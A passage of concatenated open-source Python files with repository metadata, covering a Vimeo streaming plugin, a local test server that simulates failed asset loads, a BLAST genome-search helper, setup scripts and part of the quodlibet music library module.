[{"url": validate.text, "lang": validate.text}]
),
}
},
)
_player_schema = validate.Schema(
validate.transform(_config_re.search),
validate.any(None, validate.Schema(validate.get(1), _config_schema)),
)
arguments = PluginArguments(
PluginArgument(
"mux-subtitles",
action="store_true",
help="Automatically mux available subtitles in to the output stream.",
)
)
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url)
def _get_streams(self):
if "player.vimeo.com" in self.url:
data = self.session.http.get(self.url, schema=self._player_schema)
else:
api_url = self.session.http.get(self.url, schema=self._config_url_schema)
if not api_url:
return
data = self.session.http.get(api_url, schema=self._config_schema)
videos = data["request"]["files"]
streams = []
for stream_type in ("hls", "dash"):
if stream_type not in videos:
continue
for _, video_data in videos[stream_type]["cdns"].items():
log.trace("{0!r}".format(video_data))
url = video_data.get("url")
if stream_type == "hls":
for stream in HLSStream.parse_variant_playlist(self.session, url).items():
streams.append(stream)
elif stream_type == "dash":
p = urlparse(url)
if p.path.endswith("dash.mpd"):
# LIVE
url = self.session.http.get(url).json()["url"]
elif p.path.endswith("master.json"):
# VOD
url = url.replace("master.json", "master.mpd")
else:
log.error("Unsupported DASH path: {0}".format(p.path))
continue
for stream in DASHStream.parse_manifest(self.session, url).items():
streams.append(stream)
for stream in videos.get("progressive", []):
streams.append((stream["quality"], HTTPStream(self.session, stream["url"])))
if self.get_option("mux_subtitles") and data["request"].get("text_tracks"):
substreams = {
s["lang"]: HTTPStream(self.session, "https://vimeo.com" + s["url"])
for s in data["request"]["text_tracks"]
}
for quality, stream in streams:
yield quality, MuxedStream(self.session, stream, subtitles=substreams)
else:
for stream in streams:
yield stream
__plugin__ = Vimeo
|
repotvsupertuga/tvsupertuga.repository
|
script.module.streamlink.base/resources/lib/streamlink/plugins/vimeo.py
|
Python
|
gpl-2.0
| 4,404
|
import socket, sys, time, argparse
parser = argparse.ArgumentParser(description="This bad server accepts an HTTP connection and replies with a valid HTML document which links to assets. However, attempts to load the assets should result in a net::ERR_EMPTY_RESPONSE.")
parser.add_argument("-p", "--port", type=int, help="The port to listen for new connections on.", default=8080)
parser.add_argument("-t", "--tries", type=int, help="The number of attempts before asset requests will be responded to successfully", default=5)
args = parser.parse_args()
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('localhost', args.port))
serversocket.listen(5)
print "The bad web server is listening on port %s. Requests for the HTML index will always be replied to. Assets requests will be responded to after %s unsuccessful attempts.\n" % (args.port, args.tries)
response_text = """HTTP/1.0 200 OK
Server: BadWebServer v0.1
Content-Type: text/html
<!DOCTYPE html>
<head>
<meta charset="utf-8">
<title>Bad Web Server</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script>
<script src="/script.js" id="script01"></script>
<script type="text/javascript">
function refresh_location_hints() {
$('#for_script01').val($('#script01').attr('src'));
$('#for_css01').val($('#css01').attr('href'));
$('#for_img01').val($('#img01').attr('src'));
$('#img01').attr('alt', $('#img01').attr('src'));
setTimeout(function() {
refresh_location_hints();
}, 1000);
}
$(document).ready(function() {
setTimeout(function() {
refresh_location_hints();
}, 1000);
});
</script>
<style>
input { width: 600px; }
</style>
</head>
<body>
<header>
<h1>About Bad Web Server</h1>
<p>The bad web server will correctly transfer a valid HTML5 document to the browser when the browser requests the resource identified as '/'. The page will also request images, stylesheets and javascript resources from the server - but these should all result in the browser encountering a socket error and triggering a net::ERR_EMPTY_RESPONSE. The javascript will correctly load after the 5th attempt and display an alert to the user when it loads correctly, as will the CSS resource. We also import jQuery to dynamically hint at the current location of each failed resource for testing.</p>
</header>
<article>
<input type="text" id="for_script01"> External Script (#script01) URL<br>
</article>
</body>
</html>"""
js_response_text = """HTTP/1.0 200 OK
Server: BadWebServer v0.1
Content-Type: text/javascript
alert("Javascript resource ('#script_01') loaded successfully after %s attempts");""" % args.tries
css_response_text = """HTTP/1.0 200 OK
Server: BadWebServer v0.1
Content-Type: text/stylesheet
* { margin: 5px; padding: 5px; }
body { background-color: #00ff00; color: #555555; }"""
css_requests = js_requests = 0
while True:
#accept connections from outside
(clientsocket, address) = serversocket.accept()
chunks = []
bytes_recd = 0
chunk = ""
while "\r\n\r\n" not in chunk:
chunk = clientsocket.recv(min(2048 - bytes_recd, 2048))
if chunk == '':
raise RuntimeError("socket connection broken (but not by me)")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
header = ''.join(chunks)
print "Received: " + header
request_line = header.split("\r\n")[0]
resource_marker = request_line.split()[1]
if resource_marker is "/" or resource_marker is "/index.html" or resource_marker is "/index.htm":
print "^ INDEX - WILL REPLY ^"
clientsocket.send(response_text);
clientsocket.shutdown(0)
elif ".css" in resource_marker:
css_requests += 1
if css_requests > args.tries:
css_requests = 0
print "^ FINAL CSS REQUEST - WILL REPLY ^"
clientsocket.send(css_response_text)
clientsocket.shutdown(0)
else:
print "^ CSS REQUEST #%s - WILL NOT REPLY ^" % css_requests
elif ".js" in resource_marker:
js_requests += 1
if js_requests > args.tries:
js_requests = 0
print "^ FINAL JS REQUEST - WILL REPLY ^"
clientsocket.send(js_response_text)
clientsocket.shutdown(0)
else:
print "^ JS REQUEST #%s - WILL NOT REPLY ^" % js_requests
else:
print "^ WILL NOT REPLY ^"
print "\n"
clientsocket.close()
|
djcf/error-reloader-extension
|
tests/badwebserver_jsonly.py
|
Python
|
gpl-2.0
| 4,289
|
# Copyright 2009 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import array
import tempfile
from portage import _unicode_decode
from portage import _unicode_encode
from portage.tests import TestCase
class ArrayFromfileEofTestCase(TestCase):
def testArrayFromfileEof(self):
# This tests if the following python issue is fixed
# in the currently running version of python:
# http://bugs.python.org/issue5334
input_data = "an arbitrary string"
input_bytes = _unicode_encode(input_data,
encoding='utf_8', errors='strict')
f = tempfile.TemporaryFile()
f.write(input_bytes)
f.seek(0)
data = []
eof = False
while not eof:
a = array.array('B')
try:
a.fromfile(f, len(input_bytes) + 1)
except (EOFError, IOError):
# python-3.0 lost data here
eof = True
if not a:
eof = True
else:
data.append(_unicode_decode(a.tostring(),
encoding='utf_8', errors='strict'))
f.close()
self.assertEqual(input_data, ''.join(data))
|
Neuvoo/legacy-portage
|
pym/portage/tests/ebuild/test_array_fromfile_eof.py
|
Python
|
gpl-2.0
| 1,023
|
"""audio driver subsystem"""
from os.path import exists
from os import environ
from subprocess import check_call
from functools import partial
from .drive import Driver
import click
DRIVE_QUEUE = 'a.drive'
CTL_PATH = '{}/.config/pianobar/ctl'.format(environ['HOME'])
COMMANDS = {'p', 'n', '^', '(', ')'}
def callback(ctl:'file_t', cmd:str) -> "IO ()":
"""writes command to ctl pipe"""
if cmd not in COMMANDS:
return
ctl.write(cmd)
ctl.flush()
@click.command()
@click.option('--ctl_path', default=CTL_PATH)
@click.option('--queue', default=DRIVE_QUEUE)
def main(ctl_path:str, queue:str) -> "IO ()":
"""daemon for a.drive queue consumption"""
if not exists(ctl_path):
with open('/dev/null', 'w') as null:
check_call(['pianoctl'], stdout=null)
with open(ctl_path, 'w') as ctl:
Driver(callback=partial(callback, ctl), queue=queue).drive()
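# Direct-run sketch (the package presumably exposes this via an entry point):
# if __name__ == '__main__':
#     main()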
|
acm-uiuc/DJ-Roomba
|
dj_roomba/adrive.py
|
Python
|
gpl-2.0
| 906
|
import sys,os,string
def GFX_MenuDialog(filename,*items):
file=open(filename,'w')
file.writelines(map(lambda x:x+"\n", items))
file.close()
os.system("python X11_MenuDialog.py "+filename);
if __name__=="__main__":
import qt,string
class WidgetView ( qt.QWidget ):
def __init__( self, *args ):
apply( qt.QWidget.__init__, (self,) + args )
self.topLayout = qt.QVBoxLayout( self, 10 )
self.grid = qt.QGridLayout( 0, 0 )
self.topLayout.addLayout( self.grid, 10 )
# Create a list box
self.lb = qt.QListBox( self, "listBox" )
file=open(sys.argv[1],'r')
self.dasitems=map(lambda x:string.rstrip(x),file.readlines())
file.close()
self.setCaption(self.dasitems.pop(0))
for item in self.dasitems:
self.lb.insertItem(item)
self.grid.addMultiCellWidget( self.lb, 0, 0, 0, 0 )
self.connect( self.lb, qt.SIGNAL("selected(int)"), self.listBoxItemSelected )
self.topLayout.activate()
def listBoxItemSelected( self, index ):
txt = qt.QString()
txt = "List box item %d selected" % index
print txt
file=open(sys.argv[1],'w')
file.write(self.dasitems[index])
file.close();
a.quit()
a = qt.QApplication( sys.argv )
w = WidgetView()
a.setMainWidget( w )
w.show()
a.exec_loop()
|
kmatheussen/radium
|
bin/old/X11_MenuDialog.py
|
Python
|
gpl-2.0
| 1,375
|
####### LICENSE #######
# This code is part of the Recombineering module, written by Gregory
# Moyerbrailean at Michigan State University, Department of Microbiology
# and Molecular Genetics.
# Copyright (C) 2010 Gregory Moyerbrailean
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''Handles the local BLAST and the parsing of the results.
The BLAST uses the NCBI blast+ command-line tools to run a local BLAST against
the organism's genome. In the event that a closed genome is not available for
a species, the genome of a closely related strain can be used in its place.
When a hit has been found, the parser function will extract and return relevant
information regarding the corresponding gene.
Alternatively, the user may specify to disable the BLAST function. In this case,
the module will use the scaffold files to extract the necessary information.
The user therefore does not have to have the blast+ command-line tools.
However, the user will also not be able to run organisms such as L. reuteri
against a similar genome, as this method requires exact gene matches.'''
import subprocess
from Bio.Blast.Applications import NcbiblastnCommandline as ncl
from Bio.Blast import NCBIXML as nxml
def BlastGenome(queryFile,genome,debug,outputFile='Files/extras/temp_blast.xml'):
if debug:
print "In BLASTing.BlastGenome"
# Modify the genome filename to reflect the path to the genome
genome = genome.replace(' ','')
genomePath = 'Files/genome/' + genome + '/' + genome
## Call blast+ from python
cline = ncl(query=queryFile,db=genomePath,out=outputFile,outfmt=5)
ret_code = subprocess.call(str(cline),shell=True)
if ret_code:
print 'BLASTing file "%s" returned error code %s' % (queryFile,ret_code)
temp = open(queryFile).read()
geneID = temp.split()[0]
geneID = geneID.lstrip('>')
result = nxml.read(open(outputFile))
# If the blast returns no results, it will be treated as a gene
# in the ambiguous region and oligos will be made from both strands
if result.alignments:
return parseRecord(result,genomePath,debug)
    else:
        # Return the same 6-value shape as parseRecord and SearchGenome
        return 0,0,'Ambiguous','No Match','N/A',''
def parseRecord(result,genomePath,debug):
    if debug:
        print "In BLASTing.parseRecord"
    # 'result' is the already-parsed BLAST record handed over by BlastGenome
    hit = result.alignments[0].hit_def
e = result.descriptions[0].e
if debug:
print "Blast match: ",hit
print "E-value: ",e
hitL = hit.split()
hitID = hitL[0]
t = [n for n in hitL if '..' in n]
hitInfo = t[0]
num1,num2 = hitInfo.split('..')
num2 = num2[:num2.find('(')]
num1,num2 = int(num1),int(num2)
strand = hitInfo[hitInfo.find('('):]
# Determine the direction, relative location, and position of the gene
direction = getDirection(hitInfo)
termUpper,termLower = getRelativeLocation(genomePath)
pos = getLocation(num1,termUpper,termLower)
# TODO
# Integrate warning for multiple hits
return num1,direction,pos,hit,e,''
def SearchGenome(queryFile,genomeName,debug):
from Bio import SeqIO
genomePath = 'Files/genome/'+genomeName+'/'+genomeName
genome = openGenome(genomePath)
high,low = getRelativeLocation(genomePath)
gene = SeqIO.read(open(queryFile),'fasta')
geneStr = str(gene.seq)
geneComp = str(gene.seq.reverse_complement())
count = 0
if geneStr in genome:
direction = 'forward'
n = genome.find(geneStr)
pos = getLocation(n,high,low)
count += genome.count(geneStr)
elif geneComp in genome:
direction = 'reverse'
n = genome.find(geneComp)
pos = getLocation(n,high,low)
count += genome.count(geneComp)
else:
return 0,0,'Ambiguous','No Match','N/A',''
    # If the gene sequence is present more than once, issue a warning
    bWarn = ''
    if count > 1:
        bWarn = 'Warning: Gene sequence detected multiple times in genome'
    return n,direction,pos,'No BLAST data','No BLAST data',bWarn
def getRelativeLocation(genomePath):
l,t = getTermRegion(genomePath+'.txt')
buff = 0.05 * l
high = t + buff
low = t - buff
return high,low
def getTermRegion(path):
fd = open(path)
info = fd.read()
l,t = info.split('\n')
l,t = int(l),int(t)
return l,t
def getDirection(line):
if '(+)' in line:
d = 'forward'
    elif '(-)' in line:
        d = 'reverse'
    else:
        d = 'Ambiguous'  # neither strand marker found in the hit description
    return d
def getLocation(num,high,low):
if num < low:
p = 'Early'
elif num > high:
p = 'Late'
else:
p = 'Ambiguous'
return p
def openGenome(gpath):
fd = open(gpath+'.fasta')
g = fd.read()
g = g.replace('\n','')
return g
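# Usage sketch (follows the 'Files/...' layout assumed above; names illustrative):
#   n, direction, pos, hit, e, warn = BlastGenome('Files/oligos/geneA.fasta',
#                                                 'EcoliK12', debug=False)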
|
gmoyerbrailean/PyRec
|
Files/BLASTing.py
|
Python
|
gpl-2.0
| 5,396
|
from django.db import models
class Tip(models.Model):
text = models.TextField(max_length=1000)
date = models.DateField(auto_now_add=True)
class Meta:
ordering = ['-date']
def __unicode__(self):
return '%s ' % (self.text)
class CurrentTip(models.Model):
    index = models.IntegerField(default=0)
def __unicode__(self):
return '%s ' % (self.index)
|
videntity/tweatwell
|
apps/tips/models.py
|
Python
|
gpl-2.0
| 440
|
from setuptools import setup
from glob import glob
from WebPlayer2LocalPlayer import __version__
APP = ['WebPlayer2LocalPlayer.py']
DATA_FILES = [
('images', glob('images/*.png')),
]
OPTIONS = {
'argv_emulation': True,
'includes': [
'sip',
'PyQt5', 'PyQt5.QtGui', 'PyQt5.QtPrintSupport',
'PyQt5.QtCore', 'PyQt5.QtWebKitWidgets',
'PyQt5.QtWidgets', 'PyQt5.QtNetwork', 'PyQt5.QtWebKit',
],
    'semi_standalone': False,
'compressed': True,
"optimize": 2,
"iconfile": 'images/app_icon.icns',
"qt_plugins": ["imageformats", "platforms"],
"plist": dict(
LSMinimumSystemVersion='10.8.0',
LSEnvironment=dict(
PATH='./../Resources:/usr/local/bin:/usr/bin:/bin'
)
)
}
setup(
name="WP2LP",
version=__version__,
app=APP,
data_files=DATA_FILES,
options={'py2app': OPTIONS},
setup_requires=['py2app'],
)
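# Typical build invocation (assumes py2app is installed):
#   python setup.py py2app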
|
gotlium/WebPlayer2LocalPlayer
|
setup.py
|
Python
|
gpl-2.0
| 929
|
from setuptools import setup
import os.path
setup(
name='State Fragility',
version='1',
py_modules=['state_fragility'],
data_files=[('', [
"./state_fragility.db"
])]
)
|
RealTimeWeb/datasets
|
datasets/python/state_fragility/setup.py
|
Python
|
gpl-2.0
| 198
|
import fsui
from fswidgets.widget import Widget
from launcher.i18n import gettext
from launcher.option import Option
from launcher.settings.settings_page import SettingsPage
from system.prefs.components.notworking import PrefsNotWorkingWarningPanel
class AudioSettingsPage(SettingsPage):
def __init__(self, parent: Widget) -> None:
super().__init__(parent)
PrefsNotWorkingWarningPanel(parent=self)
self.layout.add_spacer(20)
icon = fsui.Icon("audio-settings", "pkg:workspace")
gettext("Audio Settings")
title = gettext("Audio")
subtitle = ""
self.add_header(icon, title, subtitle)
self.add_option("volume")
self.add_option("stereo_separation")
self.add_section(gettext("Floppy Drive Sound Emulation"))
self.add_option("floppy_drive_volume")
self.add_option(Option.FLOPPY_DRIVE_VOLUME_EMPTY)
self.add_section(gettext("Advanced Audio Options"))
self.add_option("audio_frequency")
self.add_option("audio_buffer_target_size")
|
FrodeSolheim/fs-uae-launcher
|
launcher/settings/audio_settings_page.py
|
Python
|
gpl-2.0
| 1,061
|
#! /usr/bin/env python
"""
edits mothur taxonomy summary file
transfers last name that is not "unclassified" or "uncultured" to "unclassified" or "uncultured" assignment
make sure that the file has default sorting (by rankID)
Copyright:
tax_summary_edit edits mothur taxonomy summary file
Copyright (C) 2016 William Brazelton
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
infilename = sys.argv[1]
outfilename = infilename + '.renamed.txt'
outfile = open(outfilename,'a')
infile = open(infilename)
lasttax = ''  # most recent fully classified taxon name seen so far
for line in infile:
if "unclassified" in line:
columns = line.split('\t')
tax = columns[2]
newtax = tax + ' ' + lasttax
outfile.write(columns[0])
outfile.write('\t')
outfile.write(columns[1])
outfile.write('\t')
outfile.write(newtax)
for tab in columns[3:]:
outfile.write('\t')
outfile.write(tab)
elif "uncultured" in line:
columns = line.split('\t')
tax = columns[2]
newtax = tax + ' ' + lasttax
outfile.write(columns[0])
outfile.write('\t')
outfile.write(columns[1])
outfile.write('\t')
outfile.write(newtax)
for tab in columns[3:]:
outfile.write('\t')
outfile.write(tab)
else:
outfile.write(line)
columns = line.split('\t')
lasttax = columns[2]
infile.close()
outfile.close()
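# Usage sketch: `python tax_summary_edit.py my.taxonomy.summary` appends the
# renamed rows to my.taxonomy.summary.renamed.txt (the output is opened in
# append mode, so delete any stale output before re-running).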
|
Brazelton-Lab/lab_scripts
|
16S/tax_summary_edit.py
|
Python
|
gpl-2.0
| 1,875
|
# Copyright 2006 Joe Wreschnig
# 2013 Nick Boultbee
# 2013,2014 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Base library classes.
These classes are the most basic library classes. As such they are the
least useful but most content-agnostic.
"""
import os
import shutil
import time
from gi.repository import GObject
from senf import fsn2text, fsnative
from quodlibet import _
from quodlibet.formats import MusicFile, AudioFileError, load_audio_files, \
dump_audio_files, SerializationError
from quodlibet.query import Query
from quodlibet.qltk.notif import Task
from quodlibet.util.atomic import atomic_save
from quodlibet.util.collection import Album
from quodlibet.util.collections import DictMixin
from quodlibet import util
from quodlibet import formats
from quodlibet.util.dprint import print_d, print_w
from quodlibet.util.path import unexpand, mkdir, normalize_path, ishidden, \
ismount
class Library(GObject.GObject, DictMixin):
"""A Library contains useful objects.
The only required method these objects support is a .key
attribute, but specific types of libraries may require more
advanced interfaces.
Every method which takes a sequence of items expects items to
implement __iter__, __len__ and __contains__.
Likewise the signals emit sequences which implement
__iter__, __len__ and __contains__ e.g. set(), list() or tuple().
WARNING: The library implements the dict interface with the exception
that iterating over it yields values and not keys.
"""
__gsignals__ = {
'changed': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'removed': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'added': (GObject.SignalFlags.RUN_LAST, None, (object,)),
}
librarian = None
dirty = False
def __init__(self, name=None):
super(Library, self).__init__()
self._contents = {}
self._name = name
if self.librarian is not None and name is not None:
self.librarian.register(self, name)
def destroy(self):
if self.librarian is not None and self._name is not None:
self.librarian._unregister(self, self._name)
def changed(self, items):
"""Alert other users that these items have changed.
This causes a 'changed' signal. If a librarian is available
this function will call its changed method instead, and all
libraries that librarian manages may fire a 'changed' signal.
The item list may be filtered to those items actually in the
library. If a librarian is available, it will handle the
filtering instead. That means if this method is delegated to
the librarian, this library's changed signal may not fire, but
another's might.
"""
if not items:
return
if self.librarian and self in self.librarian.libraries.values():
print_d("Changing %d items via librarian." % len(items), self)
self.librarian.changed(items)
else:
items = {item for item in items if item in self}
if not items:
return
print_d("Changing %d items directly." % len(items), self)
self._changed(items)
def _changed(self, items):
assert isinstance(items, set)
# Called by the changed method and Librarians.
if not items:
return
print_d("Changing %d items." % len(items), self)
self.dirty = True
self.emit('changed', items)
def __iter__(self):
"""Iterate over the items in the library."""
return iter(self._contents.values())
def iteritems(self):
return iter(self._contents.items())
def iterkeys(self):
return iter(self._contents.keys())
def itervalues(self):
return iter(self._contents.values())
def __len__(self):
"""The number of items in the library."""
return len(self._contents)
def __getitem__(self, key):
"""Find a item given its key."""
return self._contents[key]
def __contains__(self, item):
"""Check if a key or item is in the library."""
try:
return item in self._contents or item.key in self._contents
except AttributeError:
return False
def get_content(self):
"""All items including hidden ones for saving the library
(see FileLibrary with masked items)
"""
return list(self.values())
def keys(self):
return self._contents.keys()
def values(self):
return self._contents.values()
def _load_item(self, item):
"""Load (add) an item into this library"""
# Subclasses should override this if they want to check
# item validity; see `FileLibrary`.
print_d("Loading %r." % item.key, self)
self.dirty = True
self._contents[item.key] = item
def _load_init(self, items):
"""Load many items into the library (on start)"""
# Subclasses should override this if they want to check
# item validity; see `FileLibrary`.
content = self._contents
for item in items:
content[item.key] = item
def add(self, items):
"""Add items. This causes an 'added' signal.
Return the sequence of items actually added, filtering out items
already in the library.
"""
items = {item for item in items if item not in self}
if not items:
return items
print_d("Adding %d items." % len(items), self)
for item in items:
self._contents[item.key] = item
self.dirty = True
self.emit('added', items)
return items
def remove(self, items):
"""Remove items. This causes a 'removed' signal.
Return the sequence of items actually removed.
"""
items = {item for item in items if item in self}
if not items:
return items
print_d("Removing %d items." % len(items), self)
for item in items:
del(self._contents[item.key])
self.dirty = True
self.emit('removed', items)
return items
def _load_items(filename):
"""Load items from disk.
In case of an error returns default or an empty list.
"""
try:
with open(filename, "rb") as fp:
data = fp.read()
except EnvironmentError:
print_w("Couldn't load library file from: %r" % filename)
return []
try:
items = load_audio_files(data)
except SerializationError:
# there are too many ways this could fail
util.print_exc()
# move the broken file out of the way
try:
shutil.copy(filename, filename + ".not-valid")
except EnvironmentError:
util.print_exc()
return []
return items
class PicklingMixin(object):
"""A mixin to provide persistence of a library by pickling to disk"""
filename = None
def load(self, filename):
"""Load a library from a file, containing a picked list.
Loading does not cause added, changed, or removed signals.
"""
self.filename = filename
print_d("Loading contents of %r." % filename, self)
items = _load_items(filename)
# this loads all items without checking their validity, but makes
# sure that non-mounted items are masked
self._load_init(items)
print_d("Done loading contents of %r." % filename, self)
def save(self, filename=None):
"""Save the library to the given filename, or the default if `None`"""
if filename is None:
filename = self.filename
print_d("Saving contents to %r." % filename, self)
try:
dirname = os.path.dirname(filename)
mkdir(dirname)
with atomic_save(filename, "wb") as fileobj:
fileobj.write(dump_audio_files(self.get_content()))
except SerializationError:
# Can happen when we try to pickle while the library is being
# modified, like in the periodic 15min save.
# Ignore, as it should try again later or on program exit.
util.print_exc()
except EnvironmentError:
print_w("Couldn't save library to path: %r" % filename)
else:
self.dirty = False
class PicklingLibrary(Library, PicklingMixin):
"""A library that pickles its contents to disk"""
def __init__(self, name=None):
print_d("Using pickling persistence for library \"%s\"" % name)
PicklingMixin.__init__(self)
Library.__init__(self, name)
class AlbumLibrary(Library):
"""An AlbumLibrary listens to a SongLibrary and sorts its songs into
albums.
The library behaves like a dictionary: the keys are album_keys of
AudioFiles, the values are Album objects.
"""
def __init__(self, library):
self.librarian = None
print_d("Initializing Album Library to watch %r" % library._name)
super(AlbumLibrary, self).__init__(
"AlbumLibrary for %s" % library._name)
self._library = library
self._asig = library.connect('added', self.__added)
self._rsig = library.connect('removed', self.__removed)
self._csig = library.connect('changed', self.__changed)
self.__added(library, library.values(), signal=False)
def load(self):
# deprecated
pass
def destroy(self):
for sig in [self._asig, self._rsig, self._csig]:
self._library.disconnect(sig)
def _get(self, item):
return self._contents.get(item)
def __add(self, items):
changed = set()
new = set()
for song in items:
key = song.album_key
if key in self._contents:
changed.add(self._contents[key])
else:
album = Album(song)
self._contents[key] = album
new.add(album)
self._contents[key].songs.add(song)
changed -= new
return changed, new
def __added(self, library, items, signal=True):
changed, new = self.__add(items)
for album in changed:
album.finalize()
if signal:
if new:
self.emit('added', new)
if changed:
self.emit('changed', changed)
def __removed(self, library, items):
changed = set()
removed = set()
for song in items:
key = song.album_key
album = self._contents[key]
album.songs.remove(song)
changed.add(album)
if not album.songs:
removed.add(album)
del self._contents[key]
changed -= removed
for album in changed:
album.finalize()
if removed:
self.emit('removed', removed)
if changed:
self.emit('changed', changed)
def __changed(self, library, items):
"""Album keys could change between already existing ones.. so we
have to do it the hard way and search by id."""
print_d("Updating affected albums for %d items" % len(items))
changed = set()
removed = set()
to_add = []
for song in items:
# in case the key hasn't changed
key = song.album_key
if key in self._contents and song in self._contents[key].songs:
changed.add(self._contents[key])
else: # key changed.. look for it in each album
to_add.append(song)
for key, album in self._contents.items():
if song in album.songs:
album.songs.remove(song)
if not album.songs:
removed.add(album)
else:
changed.add(album)
break
# get new albums and changed ones because keys could have changed
add_changed, new = self.__add(to_add)
changed |= add_changed
# check if albums that were empty at some point are still empty
for album in removed:
if not album.songs:
del self._contents[album.key]
changed.discard(album)
for album in changed:
album.finalize()
if removed:
self.emit("removed", removed)
if changed:
self.emit("changed", changed)
if new:
self.emit("added", new)
class SongLibrary(PicklingLibrary):
"""A library for songs.
Items in this kind of library must support (roughly) the AudioFile
interface.
"""
def __init__(self, *args, **kwargs):
super(SongLibrary, self).__init__(*args, **kwargs)
@util.cached_property
def albums(self):
return AlbumLibrary(self)
def destroy(self):
super(SongLibrary, self).destroy()
if "albums" in self.__dict__:
self.albums.destroy()
def tag_values(self, tag):
"""Return a set of all values for the given tag."""
return {value for song in self.values()
for value in song.list(tag)}
def rename(self, song, newname, changed=None):
"""Rename a song.
This requires a special method because it can change the
song's key.
The 'changed' signal may fire for this library or the changed
song is added to the passed changed set().
If the song exists in multiple libraries you cannot use this
method. Instead, use the librarian.
"""
print_d("Renaming %r to %r" % (song.key, newname), self)
del(self._contents[song.key])
song.rename(newname)
self._contents[song.key] = song
if changed is not None:
print_d("%s: Delaying changed signal." % (type(self).__name__,))
changed.add(song)
else:
self.changed({song})
def query(self, text, sort=None, star=Query.STAR):
"""Query the library and return matching songs."""
if isinstance(text, bytes):
text = text.decode('utf-8')
songs = self.values()
if text != "":
songs = list(filter(Query(text, star).search, songs))
return songs
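        # Usage sketch (query string syntax per quodlibet.query.Query; tag assumed):
        #   songs = library.query("artist = someone")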
def iter_paths(root, exclude=[], skip_hidden=True):
"""yields paths contained in root (symlinks dereferenced)
Any path starting with any of the path parts included in exclude
are ignored (before and after dereferencing symlinks)
Directory symlinks are not followed (except root itself)
Args:
root (fsnative)
exclude (List[fsnative])
skip_hidden (bool): Ignore files which are hidden or where any
of the parent directories are hidden.
Yields:
fsnative: absolute dereferenced paths
"""
assert isinstance(root, fsnative)
assert all((isinstance(p, fsnative) for p in exclude))
    assert os.path.isabs(root)
def skip(path):
if skip_hidden and ishidden(path):
return True
# FIXME: normalize paths..
return any((path.startswith(p) for p in exclude))
if skip_hidden and ishidden(root):
return
for path, dnames, fnames in os.walk(root):
if skip_hidden:
dnames[:] = list(filter(
lambda d: not ishidden(os.path.join(path, d)), dnames))
for filename in fnames:
fullfilename = os.path.join(path, filename)
if skip(fullfilename):
continue
fullfilename = os.path.realpath(fullfilename)
if skip(fullfilename):
continue
yield fullfilename
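# Usage sketch (paths are illustrative; fsnative per the assertions above):
#   for path in iter_paths(fsnative(u"/music"), exclude=[fsnative(u"/music/tmp")]):
#       print_d("found %r" % path)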
class FileLibrary(PicklingLibrary):
"""A library containing items on a local(-ish) filesystem.
These must support the valid, exists, mounted, and reload methods,
and have a mountpoint attribute.
"""
def __init__(self, name=None):
super(FileLibrary, self).__init__(name)
self._masked = {}
def _load_init(self, items):
"""Add many items to the library, check if the
mountpoints are available and mark items as masked if not.
Does not check if items are valid.
"""
mounts = {}
contents = self._contents
masked = self._masked
for item in items:
mountpoint = item.mountpoint
if mountpoint not in mounts:
is_mounted = ismount(mountpoint)
# In case mountpoint is mounted through autofs we need to
# access a sub path for it to mount
# https://github.com/quodlibet/quodlibet/issues/2146
if not is_mounted:
item.exists()
is_mounted = ismount(mountpoint)
mounts[mountpoint] = is_mounted
# at least one not mounted, make sure masked has an entry
if not is_mounted:
masked.setdefault(mountpoint, {})
if mounts[mountpoint]:
contents[item.key] = item
else:
masked[mountpoint][item.key] = item
def _load_item(self, item, force=False):
"""Add an item, or refresh it if it's already in the library.
No signals will be fired.
Return a tuple of booleans: (changed, removed)
"""
print_d("Loading %r." % item.key, self)
valid = item.valid()
# The item is fine; add it if it's not present.
if not force and valid:
print_d("%r is valid." % item.key, self)
self._contents[item.key] = item
return False, False
else:
# Either we should force a load, or the item is not okay.
# We're going to reload; this could change the key. So
# remove the item if it's currently in.
try:
del(self._contents[item.key])
except KeyError:
present = False
else:
present = True
# If the item still exists, reload it.
if item.exists():
try:
item.reload()
except AudioFileError:
print_d("Error reloading %r." % item.key, self)
util.print_exc()
return False, True
else:
print_d("Reloaded %r." % item.key, self)
self._contents[item.key] = item
return True, False
elif not item.mounted():
# We don't know if the item is okay or not, since
                # it's not mounted. If the item was present
# we need to mark it as removed.
print_d("Masking %r." % item.key, self)
self._masked.setdefault(item.mountpoint, {})
self._masked[item.mountpoint][item.key] = item
return False, present
else:
# The item doesn't exist at all anymore. Mark it as
# removed if it was present, otherwise nothing.
print_d("Ignoring (so removing) %r." % item.key, self)
return False, present
def reload(self, item, changed=None, removed=None):
"""Reload a song, possibly noting its status.
If sets are given, it assumes the caller will handle signals,
and only updates the sets. Otherwise, it handles signals
itself. It *always* handles library contents, so do not
try to remove (again) a song that appears in the removed set.
"""
was_changed, was_removed = self._load_item(item, force=True)
assert not (was_changed and was_removed)
if was_changed:
if changed is None:
self.emit('changed', {item})
else:
changed.add(item)
elif was_removed:
if removed is None:
self.emit('removed', {item})
else:
removed.add(item)
def rebuild(self, paths, force=False, exclude=[], cofuncid=None):
"""Reload or remove songs if they have changed or been deleted.
This generator rebuilds the library over the course of iteration.
Any paths given will be scanned for new files, using the 'scan'
method.
